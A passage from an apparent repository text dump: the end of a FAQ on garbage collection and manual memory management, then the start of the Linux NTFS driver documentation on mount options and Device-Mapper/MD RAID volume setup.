bugs in larger 128 | programs, and is a serious problem for interface abstraction. 129 | 130 | Automatic memory management frees the programmer from these concerns, 131 | making it easier for him to code in the language of his problem, 132 | rather than the tedious details of the implementation. 133 | 134 | Related terms: garbage collection 135 | 136 | What's wrong with ANSI malloc in the C library? 137 | 138 | malloc provides a very basic manual memory management service. 139 | However, it does not provide the following things, which may be 140 | desirable in your memory manager: 141 | * High performance for specified block sizes; 142 | * Tagged objects; 143 | * Simultaneous frees; 144 | * Locality of reference hints; 145 | * Formatted objects; 146 | * Garbage collection; 147 | * Deallocation of partial blocks; 148 | * Multi-threading without synchronization; 149 | * Inlined allocation code; 150 | * Finalization. 151 | 152 | Many of these can be added on top of malloc, but not with full 153 | performance. 154 | 155 | Related terms: C; malloc 156 | 157 | C++-specific questions 158 | 159 | Can I use garbage collection in C++? 160 | 161 | Yes. The C++ specification has always permitted garbage collection. 162 | Bjarne Stroustrup (C++'s designer) has proposed that this be made 163 | explicit in the standard. There exist various conservative and 164 | semi-conservative garbage collectors for C++. 165 | 166 | Related terms: C++; conservative garbage collection; semi-conservative 167 | garbage collection 168 | 169 | Useful websites: 170 | * Boehm-Weiser collector 171 | 172 | 173 | Why is delete so slow? 174 | 175 | Often delete must perform a more complex task than simply freeing the 176 | memory associated with an object; this is known as finalization. 177 | Finalization typically involves releasing any resources indirectly 178 | associated with the object, such as files that must be closed or 179 | ancillary objects that must be finalized themselves. This may involve 180 | traversing memory that has been unused for some time and hence is 181 | paged out. 182 | 183 | With a manual memory manager (such as new/delete), it is perfectly 184 | possible for the deallocation operation to vary in complexity. Some 185 | systems do quite a lot of processing on freed blocks to coalesce 186 | adjacent blocks, sort free blocks by size (in a buddy system, say), or 187 | sort the free block chain by address. In the last case, deallocating 188 | blocks in address order (or sometimes reverse address order) can 189 | result in poor performance. 190 | 191 | Related terms: deallocation; manual memory management 192 | 193 | What happens if you use class libraries that leak memory? 194 | 195 | In C++, it may be that class libraries expect you to call delete on 196 | objects they create, to invoke the destructor^(2). Check the interface 197 | documentation. 198 | 199 | Failing this, if there is a genuine memory leak in a class library for 200 | which you don't have the source, then the only thing you can try is to 201 | add a garbage collector. The Boehm-Weiser collector will work with 202 | C++. 203 | 204 | Useful websites: 205 | * Boehm-Weiser collector 206 | 207 | 208 | Can't I get all the benefits of garbage collection using C++ constructors and 209 | destructors? 210 | 211 | Carefully designed C++ constructors^(2) and destructors^(2) can go a 212 | long way towards easing the pain of manual memory management. Objects 213 | can know how to deallocate all their associated resources, including 214 | dependent objects (by recursive destruction). This means that clients 215 | of a class library do not need to worry about how to free resources 216 | allocated on their behalf. 217 | 218 | Unfortunately, they still need to worry about when to free such 219 | resources. Unless all objects are allocated for precisely one purpose, 220 | and referred to from just one place (or from within one compound data 221 | structure that will be destroyed atomically), then a piece of code 222 | that has finished with an object cannot determine that it is safe to 223 | call the destructor; it cannot be certain (especially when working 224 | with other people's code) that there is not another piece of code that 225 | will try to use the object subsequently. 226 | 227 | This is where garbage collection has the advantage, because it can 228 | determine when a given object is no longer of interest to anyone (or 229 | at least when there are no more references to it). This neatly avoids 230 | the problems of having multiple copies of the same data or complex 231 | conditional destruction. The program can construct objects and store 232 | references to them anywhere it finds convenient; the garbage collector 233 | will deal with all the problems of data sharing. 234 | 235 | Common objections to garbage collection 236 | 237 | What languages use garbage collection? 238 | 239 | Java, Lisp, Smalltalk, Prolog, ML,... the list goes on. It surprises 240 | many to learn that many implementations of BASIC use GC to manage 241 | character strings efficiently. 242 | 243 | C++ is sometimes characterized as the last holdout against GC, but 244 | this is not accurate. See FAQ: Can I use garbage collection in C++? 245 | for details. 246 | 247 | The notion of automatic memory management has stood the test of time 248 | and is becoming a standard part of modern programming environments. 249 | Some will say "the right tool for the right job", rejecting automatic 250 | memory management in some cases; few today are bold enough to suggest 251 | that there is never a place for GC among tools of the modern 252 | programmer -- either as part of a language or as an add-on component. 253 | 254 | Related terms: garbage collection 255 | 256 | What's the advantage of garbage collection? 257 | 258 | Garbage collection frees you from having to keep track of which part 259 | of your program is responsible for the deallocation of which memory. 260 | This freedom from tedious and error-prone bookkeeping allows you to 261 | concentrate on the problem you are trying to solve, without 262 | introducing additional problems of implementation. 263 | 264 | This is particularly important in large-scale or highly modular 265 | programs, especially libraries, because the problems of manual memory 266 | management often dominate interface complexity. Additionally, garbage 267 | collection can reduce the amount of memory used because the interface 268 | problems of manual memory management are often solved by creating 269 | extra copies of data. 270 | 271 | In terms of performance, garbage collection is often faster than 272 | manual memory management. It can also improve performance indirectly, 273 | by increasing locality of reference and hence reducing the size of the 274 | working set, and decreasing paging. 275 | 276 | Related terms: garbage collection 277 | 278 | Relevant publications: 279 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 280 | Collection. 281 | 282 | Programs with GC are huge and bloated; GC isn't suitable for small programs 283 | or systems. 284 | 285 | While it is true that the major advantages of garbage collection are 286 | only seen in complex systems, there is no reason for garbage 287 | collection to introduce any significant overhead at any scale. The 288 | data structures associated with garbage collection compare favorably 289 | in size with those required for manual memory management. 290 | 291 | Some older systems give garbage collection a bad name in terms of 292 | space or time overhead, but many modern techniques exist that make 293 | such overheads a thing of the past. Additionally, some garbage 294 | collectors are designed to work best in certain problem domains, such 295 | as large programs; these may perform poorly outside their target 296 | environment. 297 | 298 | Relevant publications: 299 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 300 | Collection. 301 | 302 | I can't use GC because I can't afford to have my program pause 303 | 304 | While early garbage collectors had to complete without interruption 305 | and hence would pause observably, many techniques are now available to 306 | ensure that modern collectors can be unobtrusive. 307 | 308 | Related terms: incremental garbage collection; concurrent 309 | 310 | Isn't it much cheaper to use reference counts rather than garbage 311 | collection? 312 | 313 | No, updating reference counts is quite expensive, and they have a 314 | couple of problems: 315 | * They can't cope with cycles; that is, sets of objects that are 316 | referred to only by objects in that set, but that don't have a 317 | zero reference count. 318 | * Reference counting gets more expensive if you have to allow for 319 | the count overflowing. 320 | 321 | There are many systems that use reference counts, and avoid the 322 | problems described above by using a conventional garbage collector to 323 | complement it. This is usually done for real-time benefits. 324 | Unfortunately, experience shows that this is generally less efficient 325 | than implementing a proper real-time garbage collector, except in the 326 | case where most reference counts are one. 327 | 328 | Related terms: reference counting 329 | 330 | Relevant publications: 331 | * David S. Wise. 1993. Stop-and-copy and one-bit reference counting. 332 | 333 | Isn't garbage collection unreliable? I've heard that GCs often kill the 334 | program. 335 | 336 | Garbage collectors usually have to manipulate vulnerable data 337 | structures and must often use poorly-documented, low-level interfaces. 338 | Additionally, any GC problems may not be detected until some time 339 | later. These factors combine to make most GC bugs severe in effect, 340 | hard to reproduce, and difficult to work around. 341 | 342 | On the other hand, commercial GC code will generally be heavily tested 343 | and widely used, which implies it must be reliable. It will be hard to 344 | match that reliability in a manual memory manager written for one 345 | program, especially given that manual memory management doesn't scale 346 | as well as the automatic variety. 347 | 348 | In addition, bugs in the compiler or run-time (or application if the 349 | language is as low-level as C) can corrupt the heap in ways that only 350 | the GC will detect later. The GC is blamed because the GC found the 351 | corruption. This is a classic case of shooting the messenger. 352 | 353 | I've heard that GC uses twice as much memory. 354 | 355 | This may be true of primitive GCs (like the two-space collector), but 356 | this is not generally true of garbage collection. The data structures 357 | used for GC need be no larger than those for manual memory management. 358 | 359 | Doesn't garbage collection make programs slow? 360 | 361 | No. In The Measured Cost of Conservative Garbage Collection, Zorn 362 | finds that: 363 | 364 | the CPU overhead of conservative garbage collection is comparable 365 | to that of explicit storage management techniques. [...] 366 | Conservative garbage collection performs faster than some explicit 367 | algorithms and slower than others, the relative performance being 368 | largely dependent on the program. 369 | 370 | Note also that the version of the conservative collector used in this 371 | paper is now rather old and the collector has been much improved since 372 | then. 373 | 374 | Relevant publications: 375 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 376 | Collection. 377 | 378 | Manual memory management gives me control -- it doesn't pause. 379 | 380 | It is possible for manual memory management to pause for considerable 381 | periods, either on allocation or deallocation. It certainly gives no 382 | guarantees about performance, in general. 383 | 384 | With automatic memory management, such as garbage collection, modern 385 | techniques can give guarantees about interactive pause times, and so 386 | on. 387 | 388 | Related terms: incremental garbage collection; concurrent 389 | 390 | Miscellaneous 391 | 392 | Why does my disk rattle so much? 393 | 394 | When you are using a virtual memory^(1) system, the computer may have 395 | to fetch pages of memory from disk before they can be accessed. If the 396 | total working set of your active programs exceeds the physical 397 | memory^(1) available, paging will happen continually, your disk will 398 | rattle, and performance will degrade significantly. The only solutions 399 | are to install more physical memory, run fewer programs at the same 400 | time, or tune the memory requirements of your programs. 401 | 402 | The problem is aggravated because virtual memory systems approximate 403 | the theoretical working set with the set of pages on which the working 404 | set lies. If the actual working set is spread out onto a large number 405 | of pages, then the working page-set is large. 406 | 407 | When objects that refer to each other are distant in memory, this is 408 | known as poor locality of reference. This happens either because the 409 | program's designer did not worry about this, or the memory manager 410 | used in the program doesn't permit the designer to do anything about 411 | it. 412 | 413 | Note that a copying garbage collector can dynamically organize your 414 | data according to the program's reference patterns and thus mitigate 415 | this problem. 416 | 417 | Related terms: thrash 418 | 419 | Relevant publications: 420 | * P. J. Denning. 1968. Thrashing: Its Causes and Prevention. 421 | 422 | Where can I find out more about garbage collection? 423 | 424 | Many modern languages have garbage collection built in, and the 425 | language documentation should give details. For some other languages, 426 | garbage collection can be added, see the Boehm-Weiser collector for an 427 | example of a C/C++ addition. See also The Garbage Collection FAQ. 428 | 429 | Related terms: garbage collection 430 | 431 | Relevant publications: 432 | * Paul R. Wilson. 1994. Uniprocessor Garbage Collection Techniques. 433 | * Richard E. Jones, Rafael Lins. 1996. Garbage Collection: 434 | Algorithms for Automatic Dynamic Memory Management. 435 | 436 | Where can I get a garbage collector? 437 | 438 | The Boehm-Weiser collector is suitable for C or C++. The best way to 439 | get a garbage collector, however, is to program in a language that 440 | provides garbage collection. 441 | 442 | Related terms: garbage collection 443 | 444 | Useful websites: 445 | * The Garbage Collection FAQ 446 | 447 | 448 | Why does my program use so much memory? 449 | 450 | If you are using manual memory management (for example, malloc and 451 | free in C), it is likely that your program is failing to free memory 452 | blocks after it stops using them. When your code allocates memory on 453 | the heap, there is an implied responsibility to free that memory. If a 454 | function uses heap memory for returning data, you must decide who 455 | takes on that responsibility. Pay special attention to the interfaces 456 | between functions and modules. Remember to check what happens to 457 | allocated memory in the event of an error or an exception. 458 | 459 | If you are using automatic memory management (almost certainly garbage 460 | collection), it is probable that your code is remembering some blocks 461 | that it will never use in future. This is known as the difference 462 | between liveness and reachability. Consider clearing variables that 463 | refer to large blocks or networks of blocks, when the data structure 464 | is no longer required. 465 | 466 | I use a library, and my program grows every time I call it. Why? 467 | 468 | If you are using manual memory management, it is likely that the 469 | library is allocating data structures on the heap every time it is 470 | used, but that they are not being freed. Check the interface 471 | documentation for the library; it may expect you to take some action 472 | when you have finished with returned data. It may be necessary to 473 | close down the library and re-initialize it to recover allocated 474 | memory. 475 | 476 | Unfortunately, it is all too possible that the library has a memory 477 | management bug. In this case, unless you have the source code, there 478 | is little you can do except report the problem to the supplier. It may 479 | be possible to add a garbage collector to your language, and this 480 | might solve your problems. 481 | 482 | With a garbage collector, sometimes objects are retained because there 483 | is a reference to them from some global data structure. Although the 484 | library might not make any further use of the objects, the collector 485 | must retain the objects because they are still reachable. 486 | 487 | If you know that a particular reference will never be used in future, 488 | it can be worthwhile to overwrite it. This means that the collector 489 | will not retain the referred object because of that reference. Other 490 | references to the same object will keep it alive, so your program 491 | doesn't need to determine whether the object itself will ever be 492 | accessed in future. This should be done judiciously, using the garbage 493 | collector's tools to find what objects are being retained and why. 494 | 495 | If your garbage collector is generational, it is possible that you are 496 | suffering from premature tenuring, which can often be solved by tuning 497 | the collector or using a separate memory area for the library. 498 | 499 | Related terms: memory leak; premature tenuring 500 | 501 | Should I write my own memory allocator to make my program fast? 502 | 503 | If you are sure that your program is spending a large proportion of 504 | its time in memory management, and you know what you're doing, then it 505 | is certainly possible to improve performance by writing a 506 | suballocator. On the other hand, advances in memory management 507 | technology make it hard to keep up with software written by experts. 508 | In general, improvements to memory management don't make as much 509 | difference to performance as improvements to the program algorithms. 510 | 511 | In The Measured Cost of Conservative Garbage Collection, Zorn finds: 512 | 513 | In four of the programs investigated, the programmer felt compelled 514 | to avoid using the general-purpose storage allocator by writing 515 | type-specific allocation routines for the most common object types 516 | in the program. [...] The general conclusion [...] is that 517 | programmer optimizations in these programs were mostly unnecessary. 518 | [...] simply using a different algorithm appears to improve the 519 | performance even more. 520 | 521 | and concludes: 522 | 523 | programmers, instead of spending time writing domain-specific 524 | storage allocators, should consider using other publicly-available 525 | implementations of storage management algorithms if the one they 526 | are using performs poorly. 527 | 528 | Relevant publications: 529 | * Benjamin Zorn. 1993. The Measured Cost of Conservative Garbage 530 | Collection. 531 | 532 | Why can't I just use local data on the stack or in global variables? 533 | 534 | Global, or static, data is fixed size; it cannot grow in response to 535 | the size or complexity of the data set received by a program. 536 | Stack-allocated data doesn't exist once you leave the function (or 537 | program block) in which it was declared. 538 | 539 | If your program's memory requirements are entirely predictable and 540 | fixed at compile-time, or you can structure your program to rely on 541 | stack data only while it exists, then you can entirely avoid using 542 | heap allocation. Note that, with some compilers, use of large global 543 | memory blocks can bloat the object file size. 544 | 545 | It may often seem simpler to allocate a global block that seems 546 | "probably large enough" for any plausible data set, but this 547 | simplification will almost certainly cause trouble sooner or later. 548 | 549 | Related terms: stack allocation; heap allocation; static allocation 550 | 551 | Why should I worry about virtual memory? Can't I just use as much memory as I 552 | want? 553 | 554 | While virtual memory can greatly increase your capacity to store data, 555 | there are three problems typically experienced with it: 556 | * It does not provide an unlimited amount of memory. In particular, 557 | all memory that you actually allocate (as opposed to reserve) has 558 | to be stored somewhere. Usually you must have disk space available 559 | for all pages containing allocated memory. In a few systems, you 560 | can subtract the available physical memory from the disk space 561 | required. If the memory contains images of program or data files, 562 | then file mapping, or assigning existing files to regions of the 563 | virtual address space, can help considerably. 564 | * In most computers, there is a large difference in speed between 565 | main memory and disk; running a program with a working set that 566 | does not fit in physical memory almost always results in 567 | unacceptable performance. 568 | * An additional problem with using unnecessary quantities of memory 569 | is that poor locality of reference can result in heavy paging. 570 | 571 | Related terms: virtual memory^(1); thrash 572 | 573 | Why do I need to reset my X server every week? 574 | 575 | Some X servers are notorious for leaking memory. This is probably 576 | because the sheer complexity of the X library interface, together with 577 | those for toolkits such as Motif, makes manual memory management a 578 | nightmare for the programmer. 579 | 580 | There have been reports of successful use of the Boehm-Weiser 581 | collector with X servers. 582 | 583 | Related terms: memory leak 584 | -------------------------------------------------------------------------------- /ntfs.txt: -------------------------------------------------------------------------------- 1 | The Linux NTFS filesystem driver 2 | ================================ 3 | 4 | 5 | Table of contents 6 | ================= 7 | 8 | - Overview 9 | - Web site 10 | - Features 11 | - Supported mount options 12 | - Known bugs and (mis-)features 13 | - Using NTFS volume and stripe sets 14 | - The Device-Mapper driver 15 | - The Software RAID / MD driver 16 | - Limitations when using the MD driver 17 | - ChangeLog 18 | 19 | 20 | Overview 21 | ======== 22 | 23 | Linux-NTFS comes with a number of user-space programs known as ntfsprogs. 24 | These include mkntfs, a full-featured ntfs filesystem format utility, 25 | ntfsundelete used for recovering files that were unintentionally deleted 26 | from an NTFS volume and ntfsresize which is used to resize an NTFS partition. 27 | See the web site for more information. 28 | 29 | To mount an NTFS 1.2/3.x (Windows NT4/2000/XP/2003) volume, use the file 30 | system type 'ntfs'. The driver currently supports read-only mode (with no 31 | fault-tolerance, encryption or journalling) and very limited, but safe, write 32 | support. 33 | 34 | For fault tolerance and raid support (i.e. volume and stripe sets), you can 35 | use the kernel's Software RAID / MD driver. See section "Using Software RAID 36 | with NTFS" for details. 37 | 38 | 39 | Web site 40 | ======== 41 | 42 | There is plenty of additional information on the linux-ntfs web site 43 | at http://www.linux-ntfs.org/ 44 | 45 | The web site has a lot of additional information, such as a comprehensive 46 | FAQ, documentation on the NTFS on-disk format, information on the Linux-NTFS 47 | userspace utilities, etc. 48 | 49 | 50 | Features 51 | ======== 52 | 53 | - This is a complete rewrite of the NTFS driver that used to be in the 2.4 and 54 | earlier kernels. This new driver implements NTFS read support and is 55 | functionally equivalent to the old ntfs driver and it also implements limited 56 | write support. The biggest limitation at present is that files/directories 57 | cannot be created or deleted. See below for the list of write features that 58 | are so far supported. Another limitation is that writing to compressed files 59 | is not implemented at all. Also, neither read nor write access to encrypted 60 | files is so far implemented. 61 | - The new driver has full support for sparse files on NTFS 3.x volumes which 62 | the old driver isn't happy with. 63 | - The new driver supports execution of binaries due to mmap() now being 64 | supported. 65 | - The new driver supports loopback mounting of files on NTFS which is used by 66 | some Linux distributions to enable the user to run Linux from an NTFS 67 | partition by creating a large file while in Windows and then loopback 68 | mounting the file while in Linux and creating a Linux filesystem on it that 69 | is used to install Linux on it. 70 | - A comparison of the two drivers using: 71 | time find . -type f -exec md5sum "{}" \; 72 | run three times in sequence with each driver (after a reboot) on a 1.4GiB 73 | NTFS partition, showed the new driver to be 20% faster in total time elapsed 74 | (from 9:43 minutes on average down to 7:53). The time spent in user space 75 | was unchanged but the time spent in the kernel was decreased by a factor of 76 | 2.5 (from 85 CPU seconds down to 33). 77 | - The driver does not support short file names in general. For backwards 78 | compatibility, we implement access to files using their short file names if 79 | they exist. The driver will not create short file names however, and a 80 | rename will discard any existing short file name. 81 | - The new driver supports exporting of mounted NTFS volumes via NFS. 82 | - The new driver supports async io (aio). 83 | - The new driver supports fsync(2), fdatasync(2), and msync(2). 84 | - The new driver supports readv(2) and writev(2). 85 | - The new driver supports access time updates (including mtime and ctime). 86 | - The new driver supports truncate(2) and open(2) with O_TRUNC. But at present 87 | only very limited support for highly fragmented files, i.e. ones which have 88 | their data attribute split across multiple extents, is included. Another 89 | limitation is that at present truncate(2) will never create sparse files, 90 | since to mark a file sparse we need to modify the directory entry for the 91 | file and we do not implement directory modifications yet. 92 | - The new driver supports write(2) which can both overwrite existing data and 93 | extend the file size so that you can write beyond the existing data. Also, 94 | writing into sparse regions is supported and the holes are filled in with 95 | clusters. But at present only limited support for highly fragmented files, 96 | i.e. ones which have their data attribute split across multiple extents, is 97 | included. Another limitation is that write(2) will never create sparse 98 | files, since to mark a file sparse we need to modify the directory entry for 99 | the file and we do not implement directory modifications yet. 100 | 101 | Supported mount options 102 | ======================= 103 | 104 | In addition to the generic mount options described by the manual page for the 105 | mount command (man 8 mount, also see man 5 fstab), the NTFS driver supports the 106 | following mount options: 107 | 108 | iocharset=name Deprecated option. Still supported but please use 109 | nls=name in the future. See description for nls=name. 110 | 111 | nls=name Character set to use when returning file names. 112 | Unlike VFAT, NTFS suppresses names that contain 113 | unconvertible characters. Note that most character 114 | sets contain insufficient characters to represent all 115 | possible Unicode characters that can exist on NTFS. 116 | To be sure you are not missing any files, you are 117 | advised to use nls=utf8 which is capable of 118 | representing all Unicode characters. 119 | 120 | utf8= Option no longer supported. Currently mapped to 121 | nls=utf8 but please use nls=utf8 in the future and 122 | make sure utf8 is compiled either as module or into 123 | the kernel. See description for nls=name. 124 | 125 | uid= 126 | gid= 127 | umask= Provide default owner, group, and access mode mask. 128 | These options work as documented in mount(8). By 129 | default, the files/directories are owned by root and 130 | he/she has read and write permissions, as well as 131 | browse permission for directories. No one else has any 132 | access permissions. I.e. the mode on all files is by 133 | default rw------- and for directories rwx------, a 134 | consequence of the default fmask=0177 and dmask=0077. 135 | Using a umask of zero will grant all permissions to 136 | everyone, i.e. all files and directories will have mode 137 | rwxrwxrwx. 138 | 139 | fmask= 140 | dmask= Instead of specifying umask which applies both to 141 | files and directories, fmask applies only to files and 142 | dmask only to directories. 143 | 144 | sloppy= If sloppy is specified, ignore unknown mount options. 145 | Otherwise the default behaviour is to abort mount if 146 | any unknown options are found. 147 | 148 | show_sys_files= If show_sys_files is specified, show the system files 149 | in directory listings. Otherwise the default behaviour 150 | is to hide the system files. 151 | Note that even when show_sys_files is specified, "$MFT" 152 | will not be visible due to bugs/mis-features in glibc. 153 | Further, note that irrespective of show_sys_files, all 154 | files are accessible by name, i.e. you can always do 155 | "ls -l \$UpCase" for example to specifically show the 156 | system file containing the Unicode upcase table. 157 | 158 | case_sensitive= If case_sensitive is specified, treat all file names as 159 | case sensitive and create file names in the POSIX 160 | namespace. Otherwise the default behaviour is to treat 161 | file names as case insensitive and to create file names 162 | in the WIN32/LONG name space. Note, the Linux NTFS 163 | driver will never create short file names and will 164 | remove them on rename/delete of the corresponding long 165 | file name. 166 | Note that files remain accessible via their short file 167 | name, if it exists. If case_sensitive, you will need 168 | to provide the correct case of the short file name. 169 | 170 | disable_sparse= If disable_sparse is specified, creation of sparse 171 | regions, i.e. holes, inside files is disabled for the 172 | volume (for the duration of this mount only). By 173 | default, creation of sparse regions is enabled, which 174 | is consistent with the behaviour of traditional Unix 175 | filesystems. 176 | 177 | errors=opt What to do when critical filesystem errors are found. 178 | Following values can be used for "opt": 179 | continue: DEFAULT, try to clean-up as much as 180 | possible, e.g. marking a corrupt inode as 181 | bad so it is no longer accessed, and then 182 | continue. 183 | recover: At present only supported is recovery of 184 | the boot sector from the backup copy. 185 | If read-only mount, the recovery is done 186 | in memory only and not written to disk. 187 | Note that the options are additive, i.e. specifying: 188 | errors=continue,errors=recover 189 | means the driver will attempt to recover and if that 190 | fails it will clean-up as much as possible and 191 | continue. 192 | 193 | mft_zone_multiplier= Set the MFT zone multiplier for the volume (this 194 | setting is not persistent across mounts and can be 195 | changed from mount to mount but cannot be changed on 196 | remount). Values of 1 to 4 are allowed, 1 being the 197 | default. The MFT zone multiplier determines how much 198 | space is reserved for the MFT on the volume. If all 199 | other space is used up, then the MFT zone will be 200 | shrunk dynamically, so this has no impact on the 201 | amount of free space. However, it can have an impact 202 | on performance by affecting fragmentation of the MFT. 203 | In general use the default. If you have a lot of small 204 | files then use a higher value. The values have the 205 | following meaning: 206 | Value MFT zone size (% of volume size) 207 | 1 12.5% 208 | 2 25% 209 | 3 37.5% 210 | 4 50% 211 | Note this option is irrelevant for read-only mounts. 212 | 213 | 214 | Known bugs and (mis-)features 215 | ============================= 216 | 217 | - The link count on each directory inode entry is set to 1, due to Linux not 218 | supporting directory hard links. This may well confuse some user space 219 | applications, since the directory names will have the same inode numbers. 220 | This also speeds up ntfs_read_inode() immensely. And we haven't found any 221 | problems with this approach so far. If you find a problem with this, please 222 | let us know. 223 | 224 | 225 | Please send bug reports/comments/feedback/abuse to the Linux-NTFS development 226 | list at sourceforge: linux-ntfs-dev[AT]lists.sourceforge[DOT]net 227 | 228 | 229 | Using NTFS volume and stripe sets 230 | ================================= 231 | 232 | For support of volume and stripe sets, you can either use the kernel's 233 | Device-Mapper driver or the kernel's Software RAID / MD driver. The former is 234 | the recommended one to use for linear raid. But the latter is required for 235 | raid level 5. For striping and mirroring, either driver should work fine. 236 | 237 | 238 | The Device-Mapper driver 239 | ------------------------ 240 | 241 | You will need to create a table of the components of the volume/stripe set and 242 | how they fit together and load this into the kernel using the dmsetup utility 243 | (see man 8 dmsetup). 244 | 245 | Linear volume sets, i.e. linear raid, has been tested and works fine. Even 246 | though untested, there is no reason why stripe sets, i.e. raid level 0, and 247 | mirrors, i.e. raid level 1 should not work, too. Stripes with parity, i.e. 248 | raid level 5, unfortunately cannot work yet because the current version of the 249 | Device-Mapper driver does not support raid level 5. You may be able to use the 250 | Software RAID / MD driver for raid level 5, see the next section for details. 251 | 252 | To create the table describing your volume you will need to know each of its 253 | components and their sizes in sectors, i.e. multiples of 512-byte blocks. 254 | 255 | For NT4 fault tolerant volumes you can obtain the sizes using fdisk. So for 256 | example if one of your partitions is /dev/hda2 you would do: 257 | 258 | $ fdisk -ul /dev/hda 259 | 260 | Disk /dev/hda: 81.9 GB, 81964302336 bytes 261 | 255 heads, 63 sectors/track, 9964 cylinders, total 160086528 sectors 262 | Units = sectors of 1 * 512 = 512 bytes 263 | 264 | Device Boot Start End Blocks Id System 265 | /dev/hda1 * 63 4209029 2104483+ 83 Linux 266 | /dev/hda2 4209030 37768814 16779892+ 86 NTFS 267 | /dev/hda3 37768815 46170809 4200997+ 83 Linux 268 | 269 | And you would know that /dev/hda2 has a size of 37768814 - 4209030 + 1 = 270 | 33559785 sectors. 271 | 272 | For Win2k and later dynamic disks, you can for example use the ldminfo utility 273 | which is part of the Linux LDM tools (the latest version at the time of 274 | writing is linux-ldm-0.0.8.tar.bz2). You can download it from: 275 | http://www.linux-ntfs.org/ 276 | Simply extract the downloaded archive (tar xvjf linux-ldm-0.0.8.tar.bz2), go 277 | into it (cd linux-ldm-0.0.8) and change to the test directory (cd test). You 278 | will find the precompiled (i386) ldminfo utility there. NOTE: You will not be 279 | able to compile this yourself easily so use the binary version! 280 | 281 | Then you would use ldminfo in dump mode to obtain the necessary information: 282 | 283 | $ ./ldminfo --dump /dev/hda 284 | 285 | This would dump the LDM database found on /dev/hda which describes all of your 286 | dynamic disks and all the volumes on them. At the bottom you will see the 287 | VOLUME DEFINITIONS section which is all you really need. You may need to look 288 | further above to determine which of the disks in the volume definitions is 289 | which device in Linux. Hint: Run ldminfo on each of your dynamic disks and 290 | look at the Disk Id close to the top of the output for each (the PRIVATE HEADER 291 | section). You can then find these Disk Ids in the VBLK DATABASE section in the 292 | components where you will get the LDM Name for the disk that is found in 293 | the VOLUME DEFINITIONS section. 294 | 295 | Note you will also need to enable the LDM driver in the Linux kernel. If your 296 | distribution did not enable it, you will need to recompile the kernel with it 297 | enabled. This will create the LDM partitions on each device at boot time. You 298 | would then use those devices (for /dev/hda they would be /dev/hda1, 2, 3, etc) 299 | in the Device-Mapper table. 300 | 301 | You can also bypass using the LDM driver by using the main device (e.g. 302 | /dev/hda) and then using the offsets of the LDM partitions into this device as 303 | the "Start sector of device" when creating the table. Once again ldminfo would 304 | give you the correct information to do this. 305 | 306 | Assuming you know all your devices and their sizes things are easy. 307 | 308 | For a linear raid the table would look like this (note all values are in 309 | 512-byte sectors): 310 | 311 | --- cut here --- 312 | # Offset into Size of this Raid type Device Start sector 313 | # volume device of device 314 | 0 1028161 linear /dev/hda1 0 315 | 1028161 3903762 linear /dev/hdb2 0 316 | 4931923 2103211 linear /dev/hdc1 0 317 | --- cut here --- 318 | 319 | For a striped volume, i.e. raid level 0, you will need to know the chunk size 320 | you used when creating the volume. Windows uses 64kiB as the default, so it 321 | will probably be this unless you changes the defaults when creating the array. 322 | 323 | For a raid level 0 the table would look like this (note all values are in 324 | 512-byte sectors): 325 | 326 | --- cut here --- 327 | # Offset Size Raid Number Chunk 1st Start 2nd Start 328 | # into of the type of size Device in Device in 329 | # volume volume stripes device device 330 | 0 2056320 striped 2 128 /dev/hda1 0 /dev/hdb1 0 331 | --- cut here --- 332 | 333 | If there are more than two devices, just add each of them to the end of the 334 | line. 335 | 336 | Finally, for a mirrored volume, i.e. raid level 1, the table would look like 337 | this (note all values are in 512-byte sectors): 338 | 339 | --- cut here --- 340 | # Ofs Size Raid Log Number Region Should Number Source Start Target Start 341 | # in of the type type of log size sync? of Device in Device in 342 | # vol volume params mirrors Device Device 343 | 0 2056320 mirror core 2 16 nosync 2 /dev/hda1 0 /dev/hdb1 0 344 | --- cut here --- 345 | 346 | If you are mirroring to multiple devices you can specify further targets at the 347 | end of the line. 348 | 349 | Note the "Should sync?" parameter "nosync" means that the two mirrors are 350 | already in sync which will be the case on a clean shutdown of Windows. If the 351 | mirrors are not clean, you can specify the "sync" option instead of "nosync" 352 | and the Device-Mapper driver will then copy the entirety of the "Source Device" 353 | to the "Target Device" or if you specified multipled target devices to all of 354 | them. 355 | 356 | Once you have your table, save it in a file somewhere (e.g. /etc/ntfsvolume1), 357 | and hand it over to dmsetup to work with, like so: 358 | 359 | $ dmsetup create myvolume1 /etc/ntfsvolume1 360 | 361 | You can obviously replace "myvolume1" with whatever name you like. 362 | 363 | If it all worked, you will now have the device /dev/device-mapper/myvolume1 364 | which you can then just use as an argument to the mount command as usual to 365 | mount the ntfs volume. For example: 366 | 367 | $ mount -t ntfs -o ro /dev/device-mapper/myvolume1 /mnt/myvol1 368 | 369 | (You need to create the directory /mnt/myvol1 first and of course you can use 370 | anything you like instead of /mnt/myvol1 as long as it is an existing 371 | directory.) 372 | 373 | It is advisable to do the mount read-only to see if the volume has been setup 374 | correctly to avoid the possibility of causing damage to the data on the ntfs 375 | volume. 376 | 377 | 378 | The Software RAID / MD driver 379 | ----------------------------- 380 | 381 | An alternative to using the Device-Mapper driver is to use the kernel's 382 | Software RAID / MD driver. For which you need to set up your /etc/raidtab 383 | appropriately (see man 5 raidtab). 384 | 385 | Linear volume sets, i.e. linear raid, as well as stripe sets, i.e. raid level 386 | 0, have been tested and work fine (though see section "Limitations when using 387 | the MD driver with NTFS volumes" especially if you want to use linear raid). 388 | Even though untested, there is no reason why mirrors, i.e. raid level 1, and 389 | stripes with parity, i.e. raid level 5, should not work, too. 390 | 391 | You have to use the "persistent-superblock 0" option for each raid-disk in the 392 | NTFS volume/stripe you are configuring in /etc/raidtab as the persistent 393 | superblock used by the MD driver would damage the NTFS volume. 394 | 395 | Windows by default uses a stripe chunk size of 64k, so you probably want the 396 | "chunk-size 64k" option for each raid-disk, too. 397 | 398 | For example, if you have a stripe set consisting of two partitions /dev/hda5 399 | and /dev/hdb1 your /etc/raidtab would look like this: 400 | 401 | raiddev /dev/md0 402 | raid-level 0 403 | nr-raid-disks 2 404 | nr-spare-disks 0 405 | persistent-superblock 0 406 | chunk-size 64k 407 | device /dev/hda5 408 | raid-disk 0 409 | device /dev/hdb1 410 | raid-disk 1 411 | 412 | For linear raid, just change the raid-level above to "raid-level linear", for 413 | mirrors, change it to "raid-level 1", and for stripe sets with parity, change 414 | it to "raid-level 5". 415 | 416 | Note for stripe sets with parity you will also need to tell the MD driver 417 | which parity algorithm to use by specifying the option 